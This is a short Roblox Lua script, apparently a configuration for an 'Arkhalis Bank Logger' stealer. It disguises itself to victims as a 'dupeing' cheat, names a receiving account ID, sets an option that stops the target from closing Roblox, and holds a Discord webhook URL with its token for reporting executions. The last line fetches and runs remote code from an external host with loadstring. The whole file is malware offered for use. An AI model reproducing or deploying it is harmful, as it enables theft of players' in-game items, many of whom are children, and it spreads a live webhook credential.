--[[ Arkhalis Bank Logger ]]--

--[[ Main Config ]]--
_G.UserId = 1410060179 --// Roblox Account Id [[https://www.roblox.com/users/IDHERE/profile]] <- This is a example
_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.Diamonds = 500000 --// Amount Of Diamonds To Not Kick
--[[ Webhook Config ]]--
_G.Webhook = "https://discord.com/api/webhooks/1100059723409150014/NslQqlT-9wFSCzgYeOgyrP8DevN3PDEMfBQgXU4We2_EgCsCCf2rzKiz2-5qPk4lZwRK" --// Discord Webhook For Executions

--[[ UI Config ]]--
_G.ScriptName = "dupeing" --// Script Name On The UI
_G.Tip1 = "1" --// Gives You Tips On The UI
_G.Tip2 = "2" --// Gives You Tips On The UI
_G.Tip3 = "3" --// Gives You Tips On The UI
_G.Tip4 = "4" --// Gives You Tips On The UI
_G.Tip5 = "5" --// Gives You Tips On The UI

--[[ Script ]]
loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/ArkhalisBank.lua"))()
